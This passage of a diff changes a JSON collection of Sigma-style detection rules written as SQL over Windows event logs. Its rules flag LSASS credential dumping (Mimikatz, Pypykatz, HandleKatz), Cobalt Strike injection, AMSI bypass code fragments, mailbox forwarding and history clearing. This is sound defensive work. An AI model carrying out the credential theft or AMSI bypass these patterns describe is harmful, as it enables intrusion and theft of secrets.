'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "status": "test", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "status": "experimental", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' 